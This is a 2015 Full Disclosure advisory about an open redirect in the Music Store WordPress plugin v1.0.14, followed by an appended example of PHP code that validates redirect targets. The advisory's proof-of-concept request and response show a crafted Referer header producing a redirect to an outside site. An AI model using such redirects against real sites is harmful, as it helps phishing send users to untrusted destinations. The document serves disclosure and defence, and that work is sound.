Message-ID: <CAARZ5vrBaf2YhU_YoTphhsFb6iKYPPiPUey7bS=zEB1Hxu9btg@mail.gmail.com>
Date: Sat, 25 Jul 2015 01:51:57 +0000
From: Nitin Venkatesh <venkatesh.nitin@...il.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] Open Redirect Vulnerability in Music Store Wordpress Plugin v1.0.14

# Title: Open Redirect Vulnerability in Music Store Wordpress Plugin v1.0.14
# Submitter: Nitin Venkatesh
# Product: Music Store Wordpress Plugin
# Product URL: https://wordpress.org/plugins/music-store/
# Vulnerability Type: URL Redirection to Untrusted Site ('Open Redirect') [CWE-601]
# Affected Versions: v1.0.14 and possibly below.
# Tested versions: v1.0.14
# Fixed Version: v1.0.15
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1178058/
# Changelog: https://wordpress.org/plugins/music-store/changelog/
# CVE Status: None & Fresh

## Product Information:

Music Store is an online store for selling audio files: music, speeches, narratives, everything audio. In Music Store, secure payments with PayPal.

## Vulnerability Description:

Adding HTTP referer to ms-core/ms-submit.php causes an Open redirect vulnerability

## Proof of Concept:

Sample HTTP Request:

GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://google.com/
Connection: keep-alive

Sample HTTP Response:

HTTP/1.1 302 Found
Date: Fri, 05 Jun 2015 15:29:19 GMT
location: https://google.com/
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

## Solution:

Upgrade to v1.0.15

## Disclosure Timeline:

2015-06-05 - Discovered. Contacted developer.
2015-06-10 - Updated v1.0.15 released
2015-07-25 - Publishing disclosure on FD mailing list

## Disclaimer:

This disclosure is purely meant for educational purposes. I will in no way be responsible as to how the information in this disclosure is used.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
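The advisory does not show how v1.0.15 fixed the redirect. The following is an added example, not part of the original post and not the plugin's code: one way to validate a Referer-derived redirect target so that only same-site destinations are followed. The function name, site host and sample Referer values are constructed for illustration.

```php
<?php
// Added example; not the Music Store plugin's code. Names and sample values are constructed.

/** Return $candidate only when it points back to $siteHost; otherwise $fallback. */
function pick_redirect_target(?string $candidate, string $siteHost, string $fallback): string
{
    if ($candidate === null || $candidate === '') {
        return $fallback;
    }
    // Whitespace, control bytes and backslashes make browsers and parse_url() disagree.
    if (preg_match('/[\x00-\x20\x7f\\\\]/', $candidate)) {
        return $fallback;
    }
    $parts = parse_url($candidate);
    if ($parts === false) {
        return $fallback;
    }
    $scheme = strtolower($parts['scheme'] ?? '');
    $host   = strtolower($parts['host'] ?? '');

    if ($scheme === '' && $host === '') {
        // Local path: one leading slash only ("//host" is protocol-relative).
        $local = $candidate[0] === '/' && substr($candidate, 0, 2) !== '//';
        return $local ? $candidate : $fallback;
    }
    if (!in_array($scheme, ['http', 'https'], true)) {
        return $fallback;   // javascript:, data:, ...
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return $fallback;   // https://shop.example.test@other.example/
    }
    return $host === strtolower($siteHost) ? $candidate : $fallback;
}

$site     = 'shop.example.test';            // constructed site host
$fallback = 'https://shop.example.test/';   // constructed default landing page
$referers = [                               // constructed Referer values
    'https://google.com/',                  // value from the advisory's sample request
    'https://shop.example.test/store/?p=12',
    '/store/',
    '//other.example/',
    'https://shop.example.test@other.example/',
    null,                                   // header absent
];
foreach ($referers as $r) {
    printf("%-45s -> %s\n", var_export($r, true), pick_redirect_target($r, $site, $fallback));
}
```

Inside WordPress itself, `wp_safe_redirect()` applies a comparable host allow-list check and is the usual replacement for a raw `Location` header built from request data.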